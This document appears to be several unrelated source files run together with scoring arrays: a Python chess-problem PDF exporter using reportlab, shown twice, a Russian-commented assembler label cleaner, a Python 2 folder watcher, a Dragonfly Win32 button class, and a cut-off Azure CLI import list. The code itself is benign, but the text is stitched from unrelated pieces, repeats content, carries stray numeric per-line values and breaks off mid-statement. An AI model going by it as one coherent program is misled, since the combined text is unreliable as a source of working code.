size=%d>%s</font>' % (CHESS_FONTS[ fonts[i]][0], FONT_SIZE['chess'], ''.join( spans[i])) for i in range( len(fonts))]) def getBoardTable(self, b): t = reportlab.platypus.Table( self.board2Table(b), colWidths = [FONT_SIZE['chess'] for _ in range(10)], rowHeights = [FONT_SIZE['chess'] for _ in range(10)] ) t.setStyle(reportlab.platypus.TableStyle([ #('INNERGRID', (0,0), (-1,-1), 0.25, colors.black), #('BOX', (0,0), (-1,-1), 0.25, colors.black), ])) return t def wrapParagraph(str, w): lines = [] for line in str.split("\n"): lines.extend(wrapNice(removeInlineIdents(line), w)) return "\n".join(lines) def wrapNice(line, w): if len(line) < w: return [line] words = line.split(' ') cur_line_words = [] total = 0 for i in 
range(len(words)): if total == 0: new_total = len(words[i]) else: new_total = total + 1 + len(words[i]) if new_total > w: if len(words[i]) <= w: retval = [' '.join(cur_line_words)] retval.extend(wrapNice(' '.join(words[i:]), w)) return retval else: # rough wrap slice_size = w - total - 1 cur_line_words.append(words[i][0:slice_size]) retval = [' '.join(cur_line_words)] tail = ' '.join([words[i][slice_size:]] + words[i + 1:]) retval.extend(wrapNice(tail, w)) return retval elif new_total == w: cur_line_words.append(words[i]) retval = [' '.join(cur_line_words)] if i == len(words) - 1: return retval else: retval.extend(wrapNice(' '.join(words[i + 1:]), w)) return retval else: cur_line_words.append(words[i]) total = new_total return [' '.join(cur_line_words)] def removeInlineIdents(line): outer = 0 while outer < len(line) and line[outer] == ' ': outer = outer + 1 return line[0:outer] + \ ' '.join([x for x in line.strip().split(' ') if x != ''])
[ "# -*- coding: utf-8 -*-\n", "\n", "# local\n", "import model\n", "\n", "# 3rd party\n", "import reportlab.rl_config\n", "reportlab.rl_config.warnOnMissingFontGlyphs = 0\n", "from reportlab.pdfbase import pdfmetrics\n", "from reportlab.pdfbase.ttfonts import TTFont\n", "import reportlab.platypus\n", "from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\n", "from reportlab.lib.pagesizes import A4\n", "from PyQt5 import QtGui\n", "\n", "# local\n", "import model\n", "\n", "\n", "FONT_FAMILY = 'Roboto Condensed'\n", "FONT_SIZE = {\n", " 'header': 12,\n", " 'chess': 18,\n", " 'subscript': 10,\n", " 'footer': 10,\n", " 'rightpane': 12}\n", "FONT_DIR = 'resources/fonts/roboto/'\n", "FONT_INFO = {\n", " 'normal': (\n", " FONT_FAMILY + '',\n", " 'RobotoCondensed-Regular.ttf'),\n", " 'bold': (\n", " FONT_FAMILY + ' Bold',\n", " 'RobotoCondensed-Bold.ttf'),\n", " 'italic': (\n", " FONT_FAMILY + ' Italic',\n", " 'RobotoCondensed-Italic.ttf'),\n", " 'boldItalic': (\n", " FONT_FAMILY + ' Bold Italic',\n", " 'RobotoCondensed-BoldItalic.ttf')}\n", "CHESS_FONTS = {\n", " 'd': ('GC2004D', 'resources/fonts/gc2004d_.ttf'),\n", " 'x': ('GC2004X', 'resources/fonts/gc2004x_.ttf'),\n", " 'y': ('GC2004Y', 'resources/fonts/gc2004y_.ttf')\n", "}\n", "CHESS_FONT_RENDERING_OFFSET = 0.25\n", "MARGIN_X, MARGIN_Y = 72 - FONT_SIZE['chess'], 72\n", "AUX_X_MARGIN = 36\n", "\n", "CHESS_FONT_STYLES = {}\n", "\n", "def register_fonts():\n", "\n", " for variation in list(FONT_INFO.keys()):\n", " pdfmetrics.registerFont(TTFont(FONT_INFO[variation][0], FONT_DIR+FONT_INFO[variation][1]))\n", "\n", " pdfmetrics.registerFontFamily(\n", " FONT_FAMILY,\n", " normal=FONT_INFO['normal'][0],\n", " bold=FONT_INFO['bold'][0],\n", " italic=FONT_INFO['italic'][0],\n", " boldItalic=FONT_INFO['boldItalic'][0])\n", "\n", "\n", " for key in list(CHESS_FONTS.keys()):\n", " pdfmetrics.registerFont(TTFont(CHESS_FONTS[key][0], CHESS_FONTS[key][1]))\n", " pdfmetrics.registerFontFamily(key, normal=key, 
bold=key, italic=key, boldItalic=key)\n", " styles = getSampleStyleSheet()\n", " styles.add(\n", " ParagraphStyle(\n", " name='chess'+key,\n", " wordWrap=False,\n", " fontName=CHESS_FONTS[key][0],\n", " fontSize=FONT_SIZE['chess'],\n", " spaceAfter=0))\n", " CHESS_FONT_STYLES[key] = styles['chess'+key]\n", "\n", "\n", "def getPieceParagraph(font, char):\n", " return reportlab.platypus.Paragraph(\n", " '<para autoLeading=\"max\">%s</para>' % char,\n", " CHESS_FONT_STYLES[font]\n", " )\n", "\n", "\n", "class ExportDocument:\n", "\n", " def __init__(self, records, Lang):\n", " ExportDocument.startFonts()\n", " self.records, self.Lang = records, Lang\n", " register_fonts()\n", " styles = getSampleStyleSheet()\n", " styles.add(ParagraphStyle(name='Justify', wordWrap=True))\n", " styles.add(ParagraphStyle(name='Center', alignment=reportlab.lib.enums.TA_CENTER))\n", " styles.add(\n", " ParagraphStyle(\n", " name='Pre',\n", " wordWrap=True,\n", " fontName=FONT_FAMILY,\n", " fontSize=FONT_SIZE['rightpane'],\n", " spaceAfter=FONT_SIZE['rightpane']))\n", " self.style = styles['Justify']\n", " self.style_pre = styles['Pre']\n", " self.style_center = styles['Center']\n", "\n", " def doExport(self, filename):\n", " frameTemplate = reportlab.platypus.Frame(\n", " 0, 0, A4[0], A4[1],\n", " leftPadding=MARGIN_X, bottomPadding=MARGIN_Y,\n", " rightPadding=MARGIN_X, topPadding=MARGIN_Y\n", " )\n", " pageTemplate = reportlab.platypus.PageTemplate(frames=[frameTemplate])\n", " docTemplate = reportlab.platypus.BaseDocTemplate(\n", " filename,\n", " pagesize=A4,\n", " pageTemplates=[pageTemplate],\n", " showBoundary=1,\n", " leftMargin=0,\n", " rightMargin=0,\n", " topMargin=0,\n", " bottomMargin=0,\n", " allowSplitting=1,\n", " _pageBreakQuick=1)\n", "\n", " story = []\n", " for i in range(0, len(self.records)):\n", " story.append(self.mainTable(self.records[i]))\n", " story.append(reportlab.platypus.PageBreak())\n", "\n", " docTemplate.build(story)\n", "\n", " def subscript(self, left, 
middle, right):\n", " fs = FONT_SIZE['chess']\n", " t = reportlab.platypus.Table([['', left, middle, right]],\n", " colWidths=[fs*(1+CHESS_FONT_RENDERING_OFFSET), 2 * fs, 4 * fs, 2 * fs],\n", " rowHeights=[None]\n", " )\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " ('LEFTPADDING', (1, 0), (1, 0), 0),\n", " ('RIGHTPADDING', (3, 0), (3, 0), 0),\n", " ('TOPPADDING', (0, 0), (-1, 0), FONT_SIZE['subscript']),\n", " ('VALIGN', (0, 0), (-1, 0), 'TOP'),\n", " ('ALIGN', (1, 0), (1, 0), 'LEFT'),\n", " ('ALIGN', (2, 0), (2, 0), 'CENTER'),\n", " ('ALIGN', (3, 0), (3, 0), 'RIGHT'),\n", " ('FACE', (0, 0), (-1, 0), FONT_FAMILY),\n", " ('SIZE', (0, 0), (-1, 0), FONT_SIZE['subscript'])\n", " ]))\n", " return t\n", "\n", " def mainTable(self, entry):\n", " w_left = 10 * FONT_SIZE['chess']\n", " w_right = A4[0] - 2 * MARGIN_X - w_left - AUX_X_MARGIN\n", " t = reportlab.platypus.Table(\n", " [[self.leftTop(entry), '', ''],\n", " [self.leftBottom(entry), '', self.rightBottom(entry)]],\n", " colWidths=[w_left, AUX_X_MARGIN, w_right],\n", " rowHeights=[None, None]\n", " )\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " ('VALIGN', (0, 0), (-1, 0), 'BOTTOM'),\n", " ('VALIGN', (0, 1), (-1, 1), 'TOP')\n", " ]))\n", " return t\n", "\n", " def leftTop(self, e):\n", " if e is None:\n", " return ''\n", " header = reportlab.platypus.Paragraph(\n", " '<font face=\"%s\" size=%d>%s</font><br/>' % (FONT_FAMILY, FONT_SIZE['header'],\n", " ExportDocument.header(e, self.Lang)), self.style\n", " )\n", " return reportlab.platypus.Table(\n", " [['', header]],\n", " colWidths=[FONT_SIZE['chess'], 9*FONT_SIZE['chess']]\n", " )\n", "\n", "\n", " def leftBottom(self, e):\n", " story = []\n", " if e is None:\n", " return story\n", " b = model.Board()\n", " if 'algebraic' in e:\n", " b.fromAlgebraic(e['algebraic'])\n", " story.append(self.getBoardTable(b))\n", " s_left = ''\n", " if 'stipulation' in e:\n", " s_left = e['stipulation']\n", " s_middle = reportlab.platypus.Paragraph(\n", " '<font 
face=\"%s\" size=%d>%s</font>' %\n", " (FONT_FAMILY,\n", " FONT_SIZE['footer'],\n", " ExportDocument.solver(\n", " e,\n", " self.Lang) +\n", " '<br/>' +\n", " ExportDocument.legend(b)),\n", " self.style_center)\n", " story.append(self.subscript(s_left, s_middle, b.getPiecesCount()))\n", " return story\n", "\n", "\n", " def fenLine(self, b):\n", " t = reportlab.platypus.Table([[b.toFen()]])\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " ('TEXTCOLOR', (0, 0), (-1, -1), (0.75, 0.75, 0.75)),\n", " ('LEFTPADDING', (0, 0), (-1, -1), 0),\n", " ('TOPPADDING', (0, 0), (-1, -1), FONT_SIZE['rightpane']),\n", " ]))\n", " return t\n", "\n", " def rightBottom(self, e):\n", " story = []\n", " if e is None:\n", " return story\n", " parts = []\n", " if 'solution' in e:\n", " story.append(\n", " reportlab.platypus.Preformatted(\n", " wrapParagraph(\n", " e['solution'],\n", " 50),\n", " self.style_pre))\n", " if 'keywords' in e:\n", " parts.append('<i>' + ', '.join(e['keywords']) + '</i>')\n", " if 'comments' in e:\n", " parts.append('<br/>'.join(e['comments']))\n", " story.append(reportlab.platypus.Paragraph(\n", " '<font face=\"%s\" size=%d>%s</font>' % (\n", " FONT_FAMILY,\n", " FONT_SIZE['rightpane'],\n", " '<br/><br/>'.join(parts)\n", " ), self.style\n", " ))\n", " if 'algebraic' in e:\n", " b = model.Board()\n", " b.fromAlgebraic(e['algebraic'])\n", " story.append(self.fenLine(b))\n", " return story\n", "\n", " def header(e, Lang):\n", " parts = []\n", " if'authors' in e:\n", " parts.append(\"<b>\" + \"<br/>\".join(e['authors']) + \"</b>\")\n", " if 'source' in e and 'name' in e['source']:\n", " s = \"<i>\" + e['source']['name'] + \"</i>\"\n", " sourceid = model.formatIssueAndProblemId(e['source'])\n", " if sourceid != '':\n", " s = s + \"<i> (\" + sourceid + \")</i>\"\n", " if 'date' in e['source']:\n", " s = s + \"<i>, \" + model.formatDate(e['source']['date']) + \"</i>\"\n", " parts.append(s)\n", " if 'award' in e:\n", " tourney = e.get('award', {}).get('tourney', 
{}).get('name', '')\n", " source = e.get('source', {}).get('name', '')\n", " if tourney != '' and tourney != source:\n", " parts.append(tourney)\n", " if 'distinction' in e['award']:\n", " d = model.Distinction.fromString(e['award']['distinction'])\n", " parts.append(d.toStringInLang(Lang))\n", " return ExportDocument.escapeHtml(\"<br/>\".join(parts))\n", " header = staticmethod(header)\n", "\n", " def solver(e, Lang):\n", " parts = []\n", " if(model.notEmpty(e, 'intended-solutions')):\n", " if '.' in e['intended-solutions']:\n", " parts.append(e['intended-solutions'])\n", " else:\n", " parts.append(\n", " e['intended-solutions'] +\n", " \" \" +\n", " Lang.value('EP_Intended_solutions_shortened'))\n", " if('options' in e):\n", " parts.append(\"<b>\" + \"<br/>\".join(e['options']) + \"</b>\")\n", " if('twins' in e):\n", " parts.append(model.createPrettyTwinsText(e))\n", " return ExportDocument.escapeHtml(\"<br/>\".join(parts))\n", " solver = staticmethod(solver)\n", "\n", " def legend(board):\n", " legend = board.getLegend()\n", " if len(legend) == 0:\n", " return ''\n", " return ExportDocument.escapeHtml(\n", " \"<br/>\".join([\", \".join(legend[k]) + ': ' + k for k in list(legend.keys())]))\n", " legend = staticmethod(legend)\n", "\n", " def escapeHtml(str):\n", " str = str.replace('&', '&amp;')\n", " # todo: more replacements\n", " return str\n", " escapeHtml = staticmethod(escapeHtml)\n", "\n", " fontsStarted = False\n", " def startFonts():\n", " if ExportDocument.fontsStarted:\n", " return\n", " register_fonts()\n", " ExportDocument.topBorder = [getPieceParagraph('y', char) for char in \"KLLLLLLLLM\"]\n", " ExportDocument.bottomBorder = [getPieceParagraph('y', char) for char in \"RSSSSSSSST\"]\n", " ExportDocument.leftBorder = getPieceParagraph('y', \"N\")\n", " ExportDocument.rightBorder = getPieceParagraph('y', \"Q\")\n", " ExportDocument.fontsStarted = True\n", " startFonts = staticmethod(startFonts)\n", "\n", " def board2Table(self, board):\n", " rows, row 
= [ExportDocument.topBorder], None\n", " for i in range(64):\n", " if i % 8 == 0:\n", " row = [ExportDocument.leftBorder]\n", " rows.append(row)\n", " font, char = 'd', [\"\\xA3\", \"\\xA4\"][((i >> 3) + (i % 8)) % 2]\n", " if not board.board[i] is None:\n", " glyph = board.board[i].toFen()\n", " if len(glyph) > 1:\n", " glyph = glyph[1:-1]\n", " font = model.FairyHelper.fontinfo[glyph]['family']\n", " char = model.FairyHelper.to_html(glyph, i, board.board[i].specs)\n", " row.append(getPieceParagraph(font, char))\n", " if i % 8 == 7:\n", " row.append(ExportDocument.rightBorder)\n", "\n", " rows.append(ExportDocument.bottomBorder)\n", " return rows\n", "\n", " def board2Html(self, board):\n", " lines = []\n", " spans, fonts, prevfont = [], [], 'z'\n", " for i in range(64):\n", " font, char = 'd', [\"\\xA3\", \"\\xA4\"][((i >> 3) + (i % 8)) % 2]\n", " if not board.board[i] is None:\n", " glyph = board.board[i].toFen()\n", " if len(glyph) > 1:\n", " glyph = glyph[1:-1]\n", " font = model.FairyHelper.fontinfo[glyph]['family']\n", " char = model.FairyHelper.fontinfo[glyph][\n", " 'chars'][((i >> 3) + (i % 8)) % 2]\n", " if font != prevfont:\n", " fonts.append(font)\n", " spans.append([char])\n", " prevfont = font\n", " else:\n", " spans[-1].append(char)\n", " if i != 63 and i % 8 == 7:\n", " spans[-1].append(\"<br/>\")\n", " return ''.join(\n", " [\n", " '<font face=\"%s\" size=%d>%s</font>' %\n", " (CHESS_FONTS[\n", " fonts[i]][0],\n", " FONT_SIZE['chess'],\n", " ''.join(\n", " spans[i])) for i in range(\n", " len(fonts))])\n", "\n", " def getBoardTable(self, b):\n", " t = reportlab.platypus.Table(\n", " self.board2Table(b),\n", " colWidths = [FONT_SIZE['chess'] for _ in range(10)],\n", " rowHeights = [FONT_SIZE['chess'] for _ in range(10)]\n", " )\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " #('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),\n", " #('BOX', (0,0), (-1,-1), 0.25, colors.black),\n", " ]))\n", " return t\n", "\n", "\n", "def wrapParagraph(str, 
w):\n", " lines = []\n", " for line in str.split(\"\\n\"):\n", " lines.extend(wrapNice(removeInlineIdents(line), w))\n", " return \"\\n\".join(lines)\n", "\n", "\n", "def wrapNice(line, w):\n", " if len(line) < w:\n", " return [line]\n", " words = line.split(' ')\n", " cur_line_words = []\n", " total = 0\n", " for i in range(len(words)):\n", " if total == 0:\n", " new_total = len(words[i])\n", " else:\n", " new_total = total + 1 + len(words[i])\n", " if new_total > w:\n", " if len(words[i]) <= w:\n", " retval = [' '.join(cur_line_words)]\n", " retval.extend(wrapNice(' '.join(words[i:]), w))\n", " return retval\n", " else: # rough wrap\n", " slice_size = w - total - 1\n", " cur_line_words.append(words[i][0:slice_size])\n", " retval = [' '.join(cur_line_words)]\n", " tail = ' '.join([words[i][slice_size:]] + words[i + 1:])\n", " retval.extend(wrapNice(tail, w))\n", " return retval\n", " elif new_total == w:\n", " cur_line_words.append(words[i])\n", " retval = [' '.join(cur_line_words)]\n", " if i == len(words) - 1:\n", " return retval\n", " else:\n", " retval.extend(wrapNice(' '.join(words[i + 1:]), w))\n", " return retval\n", " else:\n", " cur_line_words.append(words[i])\n", " total = new_total\n", " return [' '.join(cur_line_words)]\n", "\n", "\n", "def removeInlineIdents(line):\n", " outer = 0\n", " while outer < len(line) and line[outer] == ' ':\n", " outer = outer + 1\n", " return line[0:outer] + \\\n", " ' '.join([x for x in line.strip().split(' ') if x != ''])\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0.022222222222222223, 0.038461538461538464, 0.014492753623188406, 0.02564102564102564, 0.041666666666666664, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0.010101010101010102, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0.012195121951219513, 0.010752688172043012, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009174311926605505, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0.016129032258064516, 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0.01098901098901099, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0.03076923076923077, 0.03076923076923077, 0, 0, 0.015625, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
420
0.001661
false
#-*- coding: utf-8 -*- """ file : import LabelPurgers abs. : пакет содержит функции обработки излов графа Набор функция очистки узла """ def purge_node(label_name): """ Очистка меток Precond.: все комментакии удалены """ result = label_name result = result.replace(':', '') result = result.replace(' ', '') result = result.replace('\t', '') return result def purge_jamps_label(s): """ Очистка вспомогательных меток !! нужно уметь определать закомменценные """ # форматирование label = s.split() label[1] = label[1].replace('\t', '') label[1] = label[1].replace(':', '') sumLabel = label[1].split(';') return sumLabel[0] """ берет комманду """ def purge_bypass_and_return_labels(node): # форматирование splitList = node.split(';') label = splitList[0].split() sumLabel = label[0].split() return sumLabel[0] """ Пока берем только код операции """ def purgeLine(line): resSplitting = line.split() if len(resSplitting) > 0: return resSplitting[0] else: return ""
[ "#-*- coding: utf-8 -*-\n", "\"\"\" \n", " file : import LabelPurgers\n", "\n", " abs. : пакет содержит функции обработки излов графа\n", " Набор функция очистки узла\n", "\"\"\"\n", "\n", "def purge_node(label_name):\n", " \"\"\" Очистка меток \n", " Precond.: все комментакии удалены\n", " \"\"\"\n", " result = label_name\n", " result = result.replace(':', '')\n", " result = result.replace(' ', '')\n", " result = result.replace('\\t', '')\n", " return result\n", "\n", "def purge_jamps_label(s):\n", " \"\"\" Очистка вспомогательных меток \n", " !! нужно уметь определать закомменценные\n", " \"\"\"\n", " # форматирование\n", " label = s.split()\n", " label[1] = label[1].replace('\\t', '')\n", " label[1] = label[1].replace(':', '')\n", " sumLabel = label[1].split(';')\n", " return sumLabel[0]\n", "\n", "\"\"\" берет комманду \"\"\"\n", "def purge_bypass_and_return_labels(node):\n", " # форматирование\n", " splitList = node.split(';')\n", " label = splitList[0].split()\n", " sumLabel = label[0].split()\n", " return sumLabel[0]\n", " \n", "\"\"\" Пока берем только код операции \"\"\"\n", "def purgeLine(line):\n", " resSplitting = line.split()\n", " if len(resSplitting) > 0:\n", " return resSplitting[0]\n", " else:\n", " return \"\"" ]
[ 0.043478260869565216, 0.2, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0.02564102564102564, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0.023809523809523808, 0, 0, 0, 0, 0, 0.2, 0.02564102564102564, 0.047619047619047616, 0, 0, 0, 0, 0.058823529411764705 ]
44
0.017867
false
#!/usr/bin/python import os import script import sys import time import thread import threading job_queue = [] # List of tuples (FILEPATH, EVENT) previous_state = {} # Dictionary: key -> folderpath # value -> list of files LOCK = threading.RLock(); def background_runner(): global job_queue while True: num_of_jobs = 0 LOCK.acquire() if len(job_queue) > 0: job_tuple = job_queue.pop(0) num_of_jobs = len(job_tuple) script.update_database(job_tuple[0], job_tuple[1]) LOCK.release() if num_of_jobs == 0: time.sleep(2) else: time.sleep(1.0/(num_of_jobs * 2)) def main(): global previous_state global job_queue if len(sys.argv) != 2: print "Please enter the path to the directory to watch as an argument." exit() folder_path = sys.argv[1] thread.start_new_thread(background_runner, ()) while True: state = {} jobs_to_add = [] for root, subdirs, files in os.walk(folder_path): state[root] = files if not previous_state == state: if not previous_state == {}: # insertions for key in state: if not state.get(key) == previous_state.get(key): prev_value = previous_state.get(key) if prev_value is None: for value in state[key]: jobs_to_add.append((key + "/" + value, "new")) else: for value in state[key]: if value not in prev_value: jobs_to_add.append((key + "/" + value, "new")) # deletions for key in previous_state: if not previous_state.get(key) == state.get(key): cur_value = state.get(key) if cur_value is None: for value in previous_state[key]: jobs_to_add.append((key + "/" + value, "delete")) else: for value in previous_state[key]: if value not in cur_value: jobs_to_add.append((key + "/" + value, "delete")) previous_state = state if len(jobs_to_add) > 0: LOCK.acquire() for job in jobs_to_add: job_queue.append(job) LOCK.release() time.sleep(2) if __name__ == "__main__": main()
[ "#!/usr/bin/python\n", "\n", "import os\n", "import script\n", "import sys\n", "import time\n", "import thread\n", "import threading\n", "\n", "\n", "job_queue = [] # List of tuples (FILEPATH, EVENT)\n", "previous_state = {} # Dictionary: key -> folderpath\n", " # value -> list of files\n", "LOCK = threading.RLock();\n", "\n", "\n", "def background_runner():\n", " global job_queue\n", "\n", " while True:\n", " num_of_jobs = 0\n", "\n", " LOCK.acquire() \n", " if len(job_queue) > 0:\n", " job_tuple = job_queue.pop(0)\n", " num_of_jobs = len(job_tuple)\n", " script.update_database(job_tuple[0], job_tuple[1])\n", " LOCK.release()\n", " if num_of_jobs == 0:\n", " time.sleep(2)\n", " else:\n", " time.sleep(1.0/(num_of_jobs * 2))\n", "\n", "\n", "\n", "def main():\n", " global previous_state\n", " global job_queue\n", "\n", " if len(sys.argv) != 2:\n", " print \"Please enter the path to the directory to watch as an argument.\"\n", " exit()\n", " \n", " folder_path = sys.argv[1]\n", "\n", " thread.start_new_thread(background_runner, ())\n", "\n", " while True:\n", " state = {}\n", " jobs_to_add = []\n", "\n", " for root, subdirs, files in os.walk(folder_path):\n", " state[root] = files\n", "\n", " if not previous_state == state:\n", " if not previous_state == {}:\n", "\n", " # insertions\n", " for key in state:\n", " if not state.get(key) == previous_state.get(key):\n", " prev_value = previous_state.get(key)\n", " if prev_value is None:\n", " for value in state[key]:\n", " jobs_to_add.append((key + \"/\" + value, \"new\"))\n", " else:\n", " for value in state[key]:\n", " if value not in prev_value:\n", " jobs_to_add.append((key + \"/\" + value, \"new\"))\n", "\n", "\n", " # deletions\n", " for key in previous_state:\n", " if not previous_state.get(key) == state.get(key):\n", " cur_value = state.get(key)\n", " if cur_value is None:\n", " for value in previous_state[key]:\n", " jobs_to_add.append((key + \"/\" + value, \"delete\"))\n", " else:\n", " for value in 
previous_state[key]:\n", " if value not in cur_value:\n", " jobs_to_add.append((key + \"/\" + value, \"delete\"))\n", "\n", "\n", " previous_state = state\n", "\n", "\n", " if len(jobs_to_add) > 0:\n", " LOCK.acquire()\n", " for job in jobs_to_add:\n", " job_queue.append(job)\n", " LOCK.release()\n", "\n", " time.sleep(2)\n", "\n", "\n", "if __name__ == \"__main__\":\n", " main()" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0.019230769230769232, 0.017543859649122806, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0.011627906976744186, 0, 0, 0.02857142857142857, 0, 0, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1 ]
97
0.006708
false
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ This file implements a standard Win32 button control. """ #--------------------------------------------------------------------------- import win32con from dragonfly.windows.control_base import ControlBase #--------------------------------------------------------------------------- class Button(ControlBase): def __init__(self, parent, text, size, default=False, **kwargs): flavor = 128 style = ( win32con.BS_PUSHBUTTON | win32con.BS_TEXT | win32con.WS_CHILD | win32con.WS_TABSTOP | win32con.WS_OVERLAPPED | win32con.WS_VISIBLE) if default: style |= win32con.BS_DEFPUSHBUTTON else: style |= win32con.BS_PUSHBUTTON ControlBase.__init__(self, parent, flavor, text, size, style, **kwargs)
[ "#\r\n", "# This file is part of Dragonfly.\r\n", "# (c) Copyright 2007, 2008 by Christo Butcher\r\n", "# Licensed under the LGPL.\r\n", "#\r\n", "# Dragonfly is free software: you can redistribute it and/or modify it \r\n", "# under the terms of the GNU Lesser General Public License as published \r\n", "# by the Free Software Foundation, either version 3 of the License, or \r\n", "# (at your option) any later version.\r\n", "#\r\n", "# Dragonfly is distributed in the hope that it will be useful, but \r\n", "# WITHOUT ANY WARRANTY; without even the implied warranty of \r\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU \r\n", "# Lesser General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU Lesser General Public \r\n", "# License along with Dragonfly. If not, see \r\n", "# <http://www.gnu.org/licenses/>.\r\n", "#\r\n", "\r\n", "\"\"\"\r\n", "This file implements a standard Win32 button control.\r\n", "\r\n", "\"\"\"\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "\r\n", "import win32con\r\n", "\r\n", "from dragonfly.windows.control_base import ControlBase\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "\r\n", "class Button(ControlBase):\r\n", "\r\n", " def __init__(self, parent, text, size, default=False, **kwargs):\r\n", " flavor = 128\r\n", " style = ( win32con.BS_PUSHBUTTON\r\n", " | win32con.BS_TEXT\r\n", " | win32con.WS_CHILD\r\n", " | win32con.WS_TABSTOP\r\n", " | win32con.WS_OVERLAPPED\r\n", " | win32con.WS_VISIBLE)\r\n", " if default: style |= win32con.BS_DEFPUSHBUTTON\r\n", " else: style |= win32con.BS_PUSHBUTTON\r\n", " ControlBase.__init__(self, parent, flavor, text, size, style,\r\n", " **kwargs)\r\n" ]
[ 0, 0, 0, 0, 0, 0.013333333333333334, 0.013157894736842105, 0.013333333333333334, 0, 0, 0.014084507042253521, 0.015384615384615385, 0.013888888888888888, 0, 0, 0.014084507042253521, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0.046511627906976744, 0.02702702702702703, 0.02631578947368421, 0.025, 0.023255813953488372, 0.024390243902439025, 0.017543859649122806, 0.018518518518518517, 0, 0 ]
49
0.007181
false
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from collections import OrderedDict from azure.cli.command_modules.vm._client_factory import (cf_vm, cf_avail_set, cf_ni, cf_vm_ext, cf_vm_ext_image, cf_vm_image, cf_usage, cf_vmss, cf_vmss_vm, cf_vm_sizes, cf_disks, cf_snapshots, cf_images, cf_run_commands) from azure.cli.core.commands import DeploymentOutputLongRunningOperation, cli_command from azure.cli.core.commands.arm import \ (cli_generic_update_command, cli_generic_wait_command, handle_long_running_operation_exception, deployment_validate_table_format) from azure.cli.core.util import empty_on_404 from azure.cli.core.profiles import supported_api_version, 